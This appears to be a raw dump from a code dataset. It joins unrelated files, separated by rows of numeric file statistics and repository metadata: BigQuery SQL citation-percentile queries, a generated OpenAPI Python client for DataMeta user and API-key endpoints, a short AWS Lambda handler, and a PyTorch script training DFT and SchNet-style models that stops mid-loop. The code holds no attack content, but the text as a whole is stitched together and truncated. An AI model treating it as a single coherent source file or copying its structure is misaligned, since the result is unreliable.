max(times_cited) max_times_cited,
count(*) as count
from {DATASET}.comparison
group by 1, 2
order by 1, 2
"""
# Variant: compute scibert_percentile on the fly with ntile(100)
# partitioned by (year, scibert_hit); rows that are not SciBERT hits get
# a null percentile and fall out of count(scibert_percentile).
ntile_sql_alt = f"""\
select year,
scibert_percentile,
min(times_cited) min_times_cited,
max(times_cited) max_times_cited,
round(avg(times_cited), 4) avg_times_cited,
sum(cast(times_cited > 0 as int64)) nonzero_cite_count,
count(scibert_percentile) count
from (select cset_id,
year,
times_cited,
if(scibert_hit is true,
ntile(100) over (partition by year, scibert_hit order by times_cited asc),
null) as scibert_percentile
from {DATASET}.comparison
) t
group by 1, 2
order by 1, 2
"""
# Variant: restrict to SciBERT hits first, then ntile(100) partitioned by
# year only.
ntile_sql_alt2 = f"""\
select year,
scibert_percentile,
min(times_cited) min_times_cited,
max(times_cited) max_times_cited,
round(avg(times_cited), 4) avg_times_cited,
sum(cast(times_cited > 0 as int64)) nonzero_cite_count,
count(scibert_percentile) count
from (
select comparison.cset_id,
comparison.year,
comparison.times_cited,
ntile(100) over (partition by year order by times_cited asc) as scibert_percentile
from {DATASET}.comparison
where scibert_hit is true
) t
group by 1, 2
order by 1, 2
"""
# Variant: a single ntile(100) over all SciBERT-hit rows, not split by
# year (no year column in the output).
ntile_sql_alt3 = f"""\
select scibert_percentile,
min(times_cited) min_times_cited,
max(times_cited) max_times_cited,
round(avg(times_cited), 4) avg_times_cited,
sum(cast(times_cited > 0 as int64)) nonzero_cite_count,
count(scibert_percentile) as count
from (select cset_id,
scibert_hit,
times_cited,
ntile(100) over (order by times_cited asc) as scibert_percentile
from {DATASET}.comparison
where scibert_hit is true
) t
where scibert_hit is true
group by 1
order by 1
"""
# Variant: use the precomputed scibert_percentile column directly,
# counting nonzero citations via sum(if(...)).
ntile_sql_alt4 = f"""\
select year,
scibert_percentile,
min(times_cited) min_times_cited,
max(times_cited) max_times_cited,
round(avg(times_cited), 4) avg_times_cited,
sum(if(times_cited > 0, 1, null)) nonzero_cite_count,
count(scibert_percentile) as count
from {DATASET}.comparison
where scibert_hit is true
group by 1, 2
order by 1, 2
"""
| 33.563218
| 102
| 0.548288
| 343
| 2,920
| 4.402332
| 0.145773
| 0.251656
| 0.086093
| 0.119205
| 0.861589
| 0.796689
| 0.734437
| 0.734437
| 0.678146
| 0.638411
| 0
| 0.025014
| 0.383904
| 2,920
| 86
| 103
| 33.953488
| 0.814341
| 0
| 0
| 0.716049
| 0
| 0
| 0.947603
| 0.07363
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012346
| 0
| 0.012346
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5aeb0fc0c64be96b78bb154bc60ae24a36feb09a
| 27,815
|
py
|
Python
|
datameta_client_lib/api/authentication_and_users_api.py
|
ghga-de/datameta-client-lib
|
85c8900c26d092a929db6c5b0bd6b89cdea9a176
|
[
"Apache-2.0"
] | null | null | null |
datameta_client_lib/api/authentication_and_users_api.py
|
ghga-de/datameta-client-lib
|
85c8900c26d092a929db6c5b0bd6b89cdea9a176
|
[
"Apache-2.0"
] | 1
|
2021-03-15T18:42:36.000Z
|
2021-03-15T18:42:36.000Z
|
datameta_client_lib/api/authentication_and_users_api.py
|
ghga-de/datameta-client-lib
|
85c8900c26d092a929db6c5b0bd6b89cdea9a176
|
[
"Apache-2.0"
] | null | null | null |
"""
DataMeta
DataMeta # noqa: E501
The version of the OpenAPI document: 1.4.0
Contact: leon.kuchenbecker@uni-tuebingen.de
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from datameta_client_lib.api_client import ApiClient, Endpoint as _Endpoint
from datameta_client_lib.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from datameta_client_lib.model.api_key_list import ApiKeyList
from datameta_client_lib.model.create_token_request import CreateTokenRequest
from datameta_client_lib.model.error_model import ErrorModel
from datameta_client_lib.model.password_change import PasswordChange
from datameta_client_lib.model.user_response import UserResponse
from datameta_client_lib.model.user_session import UserSession
from datameta_client_lib.model.user_update_request import UserUpdateRequest
class AuthenticationAndUsersApi(object):
    """NOTE: This class is auto generated by OpenAPI Generator
    Ref: https://openapi-generator.tech

    Do not edit the class manually.

    Endpoints for authentication (API keys/tokens) and user management:
    key creation/deletion/listing, user lookup, user update and password
    change. Each public attribute set in __init__ is an _Endpoint whose
    callable applies the standard per-call defaults and delegates to
    call_with_http_info.
    """

    def __init__(self, api_client=None):
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

        def _apply_call_defaults(kwargs):
            # Fill in the per-call options shared by every endpoint,
            # preserving any values the caller supplied explicitly.
            # (Previously this block was duplicated verbatim in each
            # endpoint closure.)
            kwargs['async_req'] = kwargs.get('async_req', False)
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True)
            kwargs['_preload_content'] = kwargs.get('_preload_content', True)
            kwargs['_request_timeout'] = kwargs.get('_request_timeout', None)
            kwargs['_check_input_type'] = kwargs.get('_check_input_type', True)
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True)
            kwargs['_host_index'] = kwargs.get('_host_index')

        def __create_api_key(self, **kwargs):
            """Create new API Key/Token  # noqa: E501

            Synchronous by default; pass async_req=True to get a request
            thread instead (call thread.get() for the result).

            Keyword Args:
                create_token_request (CreateTokenRequest): Credentials to use
                    (optional when using cookie sessions), a label for the
                    ApiKey to be created and the date it expires. [optional]
                async_req (bool): execute request asynchronously.

            Returns:
                UserSession
            """
            _apply_call_defaults(kwargs)
            return self.call_with_http_info(**kwargs)

        self.create_api_key = _Endpoint(
            settings={
                'response_type': (UserSession,),
                'auth': ['bearerAuth', 'cookieAuth'],
                'endpoint_path': '/keys',
                'operation_id': 'create_api_key',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': ['create_token_request'],
                'required': [],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {
                    'create_token_request': (CreateTokenRequest,),
                },
                'attribute_map': {},
                'location_map': {'create_token_request': 'body'},
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': ['application/json'],
            },
            api_client=api_client,
            callable=__create_api_key,
        )

        def __delete_api_key(self, id, **kwargs):
            """Delete ApiKey by label  # noqa: E501

            Synchronous by default; pass async_req=True to get a request
            thread instead.

            Args:
                id (str): ID (not label) of Apikey

            Returns:
                None
            """
            _apply_call_defaults(kwargs)
            kwargs['id'] = id
            return self.call_with_http_info(**kwargs)

        self.delete_api_key = _Endpoint(
            settings={
                'response_type': None,
                'auth': ['bearerAuth', 'cookieAuth'],
                'endpoint_path': '/keys/{id}',
                'operation_id': 'delete_api_key',
                'http_method': 'DELETE',
                'servers': None,
            },
            params_map={
                'all': ['id'],
                'required': ['id'],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {'id': (str,)},
                'attribute_map': {'id': 'id'},
                'location_map': {'id': 'path'},
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': [],
            },
            api_client=api_client,
            callable=__delete_api_key,
        )

        def __get_user_api_keys(self, id, **kwargs):
            """All API keys for a user  # noqa: E501

            Get a list of all API keys for a user. The tokens themselves
            cannot be retrieved: they are stored hashed and only the
            respective user knows them.

            Args:
                id (str): ID of the User

            Returns:
                ApiKeyList
            """
            _apply_call_defaults(kwargs)
            kwargs['id'] = id
            return self.call_with_http_info(**kwargs)

        self.get_user_api_keys = _Endpoint(
            settings={
                'response_type': (ApiKeyList,),
                'auth': ['bearerAuth', 'cookieAuth'],
                'endpoint_path': '/users/{id}/keys',
                'operation_id': 'get_user_api_keys',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': ['id'],
                'required': ['id'],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {'id': (str,)},
                'attribute_map': {'id': 'id'},
                'location_map': {'id': 'path'},
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': [],
            },
            api_client=api_client,
            callable=__get_user_api_keys,
        )

        def __set_user_password(self, id, **kwargs):
            """Update a user's password  # noqa: E501

            The user ID can be specified either as a UUID or as a site ID.

            Args:
                id (str): User ID, either as UUID or as site ID. '0' for
                    password reset token based access.

            Keyword Args:
                password_change (PasswordChange): Old and new password.
                    [optional]

            Returns:
                None
            """
            _apply_call_defaults(kwargs)
            kwargs['id'] = id
            return self.call_with_http_info(**kwargs)

        self.set_user_password = _Endpoint(
            settings={
                'response_type': None,
                'auth': ['bearerAuth', 'cookieAuth'],
                'endpoint_path': '/users/{id}/password',
                'operation_id': 'set_user_password',
                'http_method': 'PUT',
                'servers': None,
            },
            params_map={
                'all': ['id', 'password_change'],
                'required': ['id'],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {
                    'id': (str,),
                    'password_change': (PasswordChange,),
                },
                'attribute_map': {'id': 'id'},
                'location_map': {
                    'id': 'path',
                    'password_change': 'body',
                },
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': ['application/json'],
            },
            api_client=api_client,
            callable=__set_user_password,
        )

        def __user_information_request(self, id, **kwargs):
            """Get user information  # noqa: E501

            Get information about a user.

            Args:
                id (str): ID of the user

            Returns:
                UserResponse
            """
            _apply_call_defaults(kwargs)
            kwargs['id'] = id
            return self.call_with_http_info(**kwargs)

        self.user_information_request = _Endpoint(
            settings={
                'response_type': (UserResponse,),
                'auth': ['bearerAuth', 'cookieAuth'],
                'endpoint_path': '/users/{id}',
                'operation_id': 'user_information_request',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': ['id'],
                'required': ['id'],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {'id': (str,)},
                'attribute_map': {'id': 'id'},
                'location_map': {'id': 'path'},
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': [],
            },
            api_client=api_client,
            callable=__user_information_request,
        )

        def __user_update_request(self, id, **kwargs):
            """Update a user's credentials and status  # noqa: E501

            Update a user's name, group, admin status and enabled status.

            Args:
                id (str): User ID

            Keyword Args:
                user_update_request (UserUpdateRequest): username, group,
                    admin status and enabled status. [optional]

            Returns:
                None
            """
            _apply_call_defaults(kwargs)
            kwargs['id'] = id
            return self.call_with_http_info(**kwargs)

        self.user_update_request = _Endpoint(
            settings={
                'response_type': None,
                'auth': ['bearerAuth', 'cookieAuth'],
                'endpoint_path': '/users/{id}',
                'operation_id': 'user_update_request',
                'http_method': 'PUT',
                'servers': None,
            },
            params_map={
                'all': ['id', 'user_update_request'],
                'required': ['id'],
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {
                    'id': (str,),
                    'user_update_request': (UserUpdateRequest,),
                },
                'attribute_map': {'id': 'id'},
                'location_map': {
                    'id': 'path',
                    'user_update_request': 'body',
                },
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': ['application/json'],
            },
            api_client=api_client,
            callable=__user_update_request,
        )
| 35.936693
| 235
| 0.460471
| 2,440
| 27,815
| 5.005328
| 0.097541
| 0.031688
| 0.025547
| 0.026529
| 0.819209
| 0.801932
| 0.76959
| 0.758208
| 0.749857
| 0.743634
| 0
| 0.003859
| 0.459644
| 27,815
| 773
| 236
| 35.983182
| 0.808716
| 0.342549
| 0
| 0.646484
| 1
| 0
| 0.2018
| 0.026059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013672
| false
| 0.019531
| 0.021484
| 0
| 0.048828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
518b87bd67d6ba5c51d13965719ff8db2dd83341
| 125
|
py
|
Python
|
backend/lambda_functions/update-sheets/lambda_function.py
|
MynorXico/react-crud
|
7d3691c11acdb49c19dbba2faae4f2a393645de5
|
[
"MIT"
] | null | null | null |
backend/lambda_functions/update-sheets/lambda_function.py
|
MynorXico/react-crud
|
7d3691c11acdb49c19dbba2faae4f2a393645de5
|
[
"MIT"
] | null | null | null |
backend/lambda_functions/update-sheets/lambda_function.py
|
MynorXico/react-crud
|
7d3691c11acdb49c19dbba2faae4f2a393645de5
|
[
"MIT"
] | null | null | null |
from dynamodb.handlers import sheet_handler
def lambda_handler(event, context):
    """AWS Lambda entry point: delegate the incoming event to the sheet
    handler's update operation and return its result unchanged."""
    result = sheet_handler.update(event)
    return result
| 25
| 43
| 0.784
| 16
| 125
| 5.9375
| 0.75
| 0.252632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152
| 125
| 5
| 44
| 25
| 0.896226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
519898103b5858c213f21668665e6f1da246cead
| 20,931
|
py
|
Python
|
model/train.py
|
jeah-z/BDE-FGCN-DFT
|
5542544079642a371f08c8c1f356fa235d895194
|
[
"MIT"
] | null | null | null |
model/train.py
|
jeah-z/BDE-FGCN-DFT
|
5542544079642a371f08c8c1f356fa235d895194
|
[
"MIT"
] | null | null | null |
model/train.py
|
jeah-z/BDE-FGCN-DFT
|
5542544079642a371f08c8c1f356fa235d895194
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
"""training code
"""
import numpy as np
import pandas as pd
import argparse
import torch as th
import torch.nn as nn
import os
from torch.utils.data import DataLoader
from dft import DftModel
def train_dft(model="nmr", epochs=80, device=th.device("cpu"), args=''):
    """Train the polynomial DFT-correction model (DftModel) on the
    train split, evaluating on the valid and test splits each epoch.

    Args:
        model: dataset flavour selecting which Alchemy dataset module to
            import: 'nmr', 'bde' or 'literature'.
        epochs: number of training epochs.
        device: torch device to run on.
        args: parsed argparse namespace — must provide train_file,
            valid_file, test_file, save (output dir) and saveFreq
            (checkpoint/prediction-dump interval in epochs).
    """
    print("start")
    train_file = args.train_file
    valid_file = args.valid_file
    test_file = args.test_file
    save = args.save
    # train_dir = "./"
    # train_file = dataset+"_train.csv"
    # Import the dataset variant lazily so only the requested flavour's
    # module is loaded.
    if model == 'nmr':
        from Alchemy_dataset_nmr import TencentAlchemyDataset, batcher
        # from sch_nmr import SchNetModel
    elif model == 'bde':
        from Alchemy_dataset_bde import TencentAlchemyDataset, batcher
        # from sch_bde import SchNetModel
    elif model == 'literature':
        from Alchemy_dataset_litr import TencentAlchemyDataset, batcher
        # from sch_litr import SchNetModel
    # Train / valid / test datasets all use mode "Train" so that labels
    # are loaded for every split.
    alchemy_dataset = TencentAlchemyDataset()
    alchemy_dataset.mode = "Train"
    alchemy_dataset.transform = None
    alchemy_dataset.file_path = train_file
    alchemy_dataset._load()
    valid_dataset = TencentAlchemyDataset()
    # valid_dir = train_dir
    # valid_file = dataset+"_valid.csv"
    valid_dataset.mode = "Train"
    valid_dataset.transform = None
    valid_dataset.file_path = valid_file
    valid_dataset._load()
    test_dataset = TencentAlchemyDataset()
    # test_dir = train_dir
    # test_file = dataset+"_valid.csv"
    test_dataset.mode = "Train"
    test_dataset.transform = None
    test_dataset.file_path = test_file
    test_dataset._load()
    alchemy_loader = DataLoader(
        dataset=alchemy_dataset,
        batch_size=20,
        collate_fn=batcher(),
        shuffle=True,
        num_workers=0,
    )
    valid_loader = DataLoader(
        dataset=valid_dataset,
        batch_size=20,
        collate_fn=batcher(),
        shuffle=False,
        num_workers=0,
    )
    test_loader = DataLoader(
        dataset=test_dataset,
        batch_size=20,
        collate_fn=batcher(),
        shuffle=False,
        num_workers=0,
    )
    dft_model = DftModel(poly_order=5)
    print(model)
    # if model.name in ["MGCN", "SchNet"]:
    # model.set_mean_std(alchemy_dataset.mean, alchemy_dataset.std, device)
    dft_model.to(device)
    # print("test_dataset.mean= %s" % (alchemy_dataset.mean))
    # print("test_dataset.std= %s" % (alchemy_dataset.std))
    loss_fn = nn.MSELoss()
    MAE_fn = nn.L1Loss()
    dft_optimizer = th.optim.Adam(
        dft_model.parameters(), lr=0.001, weight_decay=0.000001)
    # scheduler = th.optim.lr_scheduler.StepLR(optimizer, 30, gamma=0.9, eta_min=0.0001, last_epoch=-1)
    scheduler = th.optim.lr_scheduler.ReduceLROnPlateau(
        dft_optimizer, mode='min', factor=0.9, patience=10, threshold=0.0000001, threshold_mode='rel', cooldown=0, min_lr=0.000001, eps=1e-08, verbose=False)
    # NOTE(review): this log file handle is never closed explicitly.
    log = open(save + '/train_log.txt', 'w')

    def print_res(label, res, op):
        # Dump "label,prediction" rows to the open file handle `op`.
        size = len(res)
        for i in range(size):
            line = "%s,%s\n" % (label[i][0], res[i])
            op.writelines(line)

    def eval_dft(model, epoch, data_loader, eval_mode, log):
        # Evaluate dft_model on `data_loader`, printing/logging loss and
        # MAE, and dump predictions to CSV every args.saveFreq epochs.
        # NOTE(review): the `model` parameter is unused — the closure
        # always evaluates the enclosing dft_model.
        val_loss, val_mae = 0, 0
        for jdx, batch in enumerate(data_loader):
            batch.graph.to(device)
            batch.label = batch.label.to(device)
            batch.graph0 = batch.graph0.to(device)
            batch.graph1 = batch.graph1.to(device)
            batch.graph2 = batch.graph2.to(device)
            batch.graph3 = batch.graph3.to(device)
            batch.graph4 = batch.graph4.to(device)
            batch.graph5 = batch.graph5.to(device)
            batch.graph6 = batch.graph6.to(device)
            batch.graph7 = batch.graph7.to(device)
            batch.feature = batch.feature.to(device)
            batch.dft = batch.dft.to(device)
            res_dft = dft_model(batch.dft)
            # new_dft = dft_model.make_features(batch.dft)
            # res_dft = new_dft.mul(w_dft)
            # res_dft = res_dft.sum(1)
            # res_dft = res_dft.unsqueeze(1)
            # NOTE(review): l and r are computed but unused in this loop.
            l = batch.label.cpu().detach().numpy()
            r = res_dft.cpu().detach().numpy()
            loss = loss_fn(res_dft, batch.label)
            mae = MAE_fn(res_dft, batch.label)
            val_mae += mae.detach().item()
            val_loss += loss.detach().item()
        # Average the accumulated batch metrics (jdx is the last index).
        val_mae /= jdx + 1
        val_loss /= jdx + 1
        print(
            f"Epoch {epoch} {eval_mode}_loss: {round(val_loss,4)}, {eval_mode}_mae: {round(val_mae,4)}")
        log.write(
            f"Epoch {epoch} {eval_mode}_loss: {round(val_loss,4)}, {eval_mode}_mae: {round(val_mae,4)}\n")
        if epoch % args.saveFreq == 0:
            # op_file = open('save/'+str(epoch)+'re')
            # Second pass over the loader purely to dump predictions.
            res_op = open(f'{save}/{eval_mode}_res_{epoch}.csv', 'w')
            for jdx, batch in enumerate(data_loader):
                batch.graph.to(device)
                batch.label = batch.label.to(device)
                batch.graph0 = batch.graph0.to(device)
                batch.graph1 = batch.graph1.to(device)
                batch.graph2 = batch.graph2.to(device)
                batch.graph3 = batch.graph3.to(device)
                batch.graph4 = batch.graph4.to(device)
                batch.graph5 = batch.graph5.to(device)
                batch.graph6 = batch.graph6.to(device)
                batch.graph7 = batch.graph7.to(device)
                batch.feature = batch.feature.to(device)
                batch.dft = batch.dft.to(device)
                res_dft = dft_model(batch.dft)
                # new_dft = dft_model.make_features(batch.dft)
                # res_dft = new_dft.mul(w_dft)
                # res_dft = res_dft.sum(1)
                # res_dft = res_dft.unsqueeze(1)
                # res = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
                # batch.feature)
                l = batch.label.cpu().detach().numpy()
                r = res_dft.cpu().detach().numpy()
                print_res(l, r, res_op)
            res_op.close()

    # Main training loop.
    for epoch in range(epochs):
        w_loss, w_mae = 0, 0
        dft_model.train()
        for idx, batch in enumerate(alchemy_loader):
            batch.graph.to(device)
            batch.label = batch.label.to(device)
            batch.graph0 = batch.graph0.to(device)
            batch.graph1 = batch.graph1.to(device)
            batch.graph2 = batch.graph2.to(device)
            batch.graph3 = batch.graph3.to(device)
            batch.graph4 = batch.graph4.to(device)
            batch.graph5 = batch.graph5.to(device)
            batch.graph6 = batch.graph6.to(device)
            batch.graph7 = batch.graph7.to(device)
            batch.feature = batch.feature.to(device)
            batch.dft = batch.dft.to(device)
            # print(f'batch.dft={batch.dft}')
            res_dft = dft_model(batch.dft)
            # print(f'res_dft={res_dft}')
            # print(f'batch.label={batch.label}')
            # new_dft = dft_model.make_features(batch.dft)
            # res_dft = new_dft.mul(w_dft)
            # res_dft = res_dft.sum(1)
            # res_dft = res_dft.unsqueeze(1)
            # res = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
            # batch.feature)
            # print(f"res_dft= {res_dft}")
            # print(f"label= {batch.label}")
            dft_loss = loss_fn(res_dft, batch.label)
            # print(f"batch_label: {batch.label}")
            mae = MAE_fn(res_dft, batch.label)
            dft_optimizer.zero_grad()
            dft_loss.backward()
            dft_optimizer.step()
            w_mae += mae.detach().item()
            w_loss += dft_loss.detach().item()
        w_mae /= idx + 1
        w_loss /= idx + 1
        # Scheduler steps on training MAE (plateau-based LR decay).
        scheduler.step(w_mae)
        print("Epoch {:2d}, loss: {:.7f}, mae: {:.7f}".format(
            epoch, w_loss, w_mae))
        log.write("Epoch {:2d}, loss: {:.7f}, mae: {:.7f} \n".format(
            epoch, w_loss, w_mae))
        dft_model.eval()
        with th.no_grad():
            if epoch % args.saveFreq == 0:
                # Checkpoint the model and dump training-set predictions.
                res_op = open(save+'/Train_res_'+str(epoch)+'.csv', 'w')
                th.save(dft_model, save+'/dft_model_'+str(epoch))
                for jdx, batch in enumerate(alchemy_loader):
                    batch.graph.to(device)
                    batch.label = batch.label.to(device)
                    batch.graph0 = batch.graph0.to(device)
                    batch.graph1 = batch.graph1.to(device)
                    batch.graph2 = batch.graph2.to(device)
                    batch.graph3 = batch.graph3.to(device)
                    batch.graph4 = batch.graph4.to(device)
                    batch.graph5 = batch.graph5.to(device)
                    batch.graph6 = batch.graph6.to(device)
                    batch.graph7 = batch.graph7.to(device)
                    batch.feature = batch.feature.to(device)
                    batch.dft = batch.dft.to(device)
                    res_dft = dft_model(batch.dft)
                    # new_dft = dft_model.make_features(batch.dft)
                    # res_dft = new_dft.mul(w_dft)
                    # res_dft = res_dft.sum(1)
                    # res_dft = res_dft.unsqueeze(1)
                    l = batch.label.cpu().detach().numpy()
                    r = res_dft.cpu().detach().numpy()
                    print_res(l, r, res_op)
                res_op.close()
            eval_dft(model, epoch, valid_loader, 'valid', log)
            eval_dft(model, epoch, test_loader, 'test', log)
def train_gcn(model="nmr", epochs=80, device=th.device("cpu"), args=''):
print("start training gcn model!")
train_file = args.train_file
valid_file = args.valid_file
test_file = args.test_file
save = args.save
model = args.model
dft_model_name = args.dft_model
dft_model = DftModel(5)
dft_model = th.load(dft_model_name)
dft_model.to(device)
dft_model.param.requires_grad = False
print(f"{dft_model.param} in linear model has been setted as nontrainable.")
if model == 'nmr':
from Alchemy_dataset_nmr import TencentAlchemyDataset, batcher
from sch_nmr import SchNetModel
elif model == 'bde':
from Alchemy_dataset_bde import TencentAlchemyDataset, batcher
from sch_bde import SchNetModel
elif model == 'literature':
from Alchemy_dataset_litr import TencentAlchemyDataset, batcher
from sch_litr import SchNetModel
alchemy_dataset = TencentAlchemyDataset()
alchemy_dataset.mode = "Train"
alchemy_dataset.transform = None
alchemy_dataset.file_path = train_file
alchemy_dataset._load()
valid_dataset = TencentAlchemyDataset()
# valid_dir = train_dir
# valid_file = dataset+"_valid.csv"
valid_dataset.mode = "Train"
valid_dataset.transform = None
valid_dataset.file_path = valid_file
valid_dataset._load()
test_dataset = TencentAlchemyDataset()
# test_dir = train_dir
# test_file = dataset+"_valid.csv"
test_dataset.mode = "Train"
test_dataset.transform = None
test_dataset.file_path = test_file
test_dataset._load()
alchemy_loader = DataLoader(
dataset=alchemy_dataset,
batch_size=20,
collate_fn=batcher(),
shuffle=True,
num_workers=0,
)
valid_loader = DataLoader(
dataset=valid_dataset,
batch_size=20,
collate_fn=batcher(),
shuffle=False,
num_workers=0,
)
test_loader = DataLoader(
dataset=test_dataset,
batch_size=20,
collate_fn=batcher(),
shuffle=False,
num_workers=0,
)
model = SchNetModel()
print(model)
model.to(device)
# print("test_dataset.mean= %s" % (alchemy_dataset.mean))
# print("test_dataset.std= %s" % (alchemy_dataset.std))
loss_fn = nn.MSELoss()
MAE_fn = nn.L1Loss()
optimizer = th.optim.Adam(
model.parameters(), lr=0.00001, weight_decay=0.000001)
scheduler = th.optim.lr_scheduler.ReduceLROnPlateau(
optimizer, mode='min', factor=0.9, patience=10, threshold=0.0000001, threshold_mode='rel', cooldown=0, min_lr=0.000001, eps=1e-08, verbose=False)
log = open(save + '/train_log.txt', 'w')
def print_res(label, res, op):
size = len(res)
for i in range(size):
line = "%s,%s\n" % (label[i][0], res[i][0])
op.writelines(line)
def eval_gcn(model, epoch, data_loader, eval_mode, log):
    """Evaluate *model* on *data_loader* and log averaged MSE loss / MAE.

    Every args.saveFreq epochs, additionally re-runs the loader and dumps
    per-sample (label, prediction) pairs to '{save}/{eval_mode}_res_{epoch}.csv'.

    Uses names from the enclosing scope: device, dft_model, loss_fn, MAE_fn,
    args, save, print_res.
    NOTE(review): this function is not wrapped in th.no_grad(), so autograd
    state is tracked during evaluation — confirm whether that is intentional.
    """
    val_loss, val_mae = 0, 0
    for jdx, batch in enumerate(data_loader):
        # NOTE(review): return value of .to(device) is discarded here; assumes
        # the graph object is moved in place — confirm for the DGL version used.
        batch.graph.to(device)
        batch.label = batch.label.to(device)
        batch.graph0 = batch.graph0.to(device)
        batch.graph1 = batch.graph1.to(device)
        batch.graph2 = batch.graph2.to(device)
        batch.graph3 = batch.graph3.to(device)
        batch.graph4 = batch.graph4.to(device)
        batch.graph5 = batch.graph5.to(device)
        batch.graph6 = batch.graph6.to(device)
        batch.graph7 = batch.graph7.to(device)
        batch.feature = batch.feature.to(device)
        batch.dft = batch.dft.to(device)
        # Final prediction = linear DFT-feature model output + GCN correction.
        res_dft = dft_model(batch.dft)
        # new_dft = dft_model.make_features(batch.dft)
        # res_dft = new_dft.mul(w_dft)
        # res_dft = res_dft.sum(1)
        # res_dft = res_dft.unsqueeze(1)
        res_gcn = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3,
                        batch.graph4, batch.graph5, batch.graph6, batch.graph7, batch.feature)
        res = res_dft+res_gcn
        loss = loss_fn(res, batch.label)
        mae = MAE_fn(res, batch.label)
        val_mae += mae.detach().item()
        val_loss += loss.detach().item()
    # Average over batches. Assumes data_loader yields at least one batch;
    # otherwise jdx is undefined here.
    val_mae /= jdx + 1
    val_loss /= jdx + 1
    print(
        f"Epoch {epoch} {eval_mode}_loss: {round(val_loss,4)}, {eval_mode}_mae: {round(val_mae,4)}")
    log.write(
        f"Epoch {epoch} {eval_mode}_loss: {round(val_loss,4)}, {eval_mode}_mae: {round(val_mae,4)}\n")
    if epoch % args.saveFreq == 0:
        # Periodic CSV dump of per-sample predictions (second full pass over data).
        # op_file = open('save/'+str(epoch)+'re')
        res_op = open(f'{save}/{eval_mode}_res_{epoch}.csv', 'w')
        # th.save(model.state_dict(), save+'/model_'+str(epoch))
        for jdx, batch in enumerate(data_loader):
            batch.graph.to(device)
            batch.label = batch.label.to(device)
            batch.graph0 = batch.graph0.to(device)
            batch.graph1 = batch.graph1.to(device)
            batch.graph2 = batch.graph2.to(device)
            batch.graph3 = batch.graph3.to(device)
            batch.graph4 = batch.graph4.to(device)
            batch.graph5 = batch.graph5.to(device)
            batch.graph6 = batch.graph6.to(device)
            batch.graph7 = batch.graph7.to(device)
            batch.feature = batch.feature.to(device)
            batch.dft = batch.dft.to(device)
            res_dft = dft_model(batch.dft)
            # new_dft = dft_model.make_features(batch.dft)
            # res_dft = new_dft.mul(w_dft)
            # res_dft = res_dft.sum(1)
            # res_dft = res_dft.unsqueeze(1)
            res_gcn = model(batch.graph, batch.graph0, batch.graph1, batch.graph2, batch.graph3, batch.graph4, batch.graph5, batch.graph6, batch.graph7,
                            batch.feature)
            res = res_dft+res_gcn
            l = batch.label.cpu().detach().numpy()
            r = res.cpu().detach().numpy()
            print_res(l, r, res_op)
        res_op.close()
for epoch in range(epochs):
w_loss, w_mae = 0, 0
# dft_model.eval()
model.train()
for idx, batch in enumerate(alchemy_loader):
batch.graph.to(device)
batch.label = batch.label.to(device)
batch.graph0 = batch.graph0.to(device)
batch.graph1 = batch.graph1.to(device)
batch.graph2 = batch.graph2.to(device)
batch.graph3 = batch.graph3.to(device)
batch.graph4 = batch.graph4.to(device)
batch.graph5 = batch.graph5.to(device)
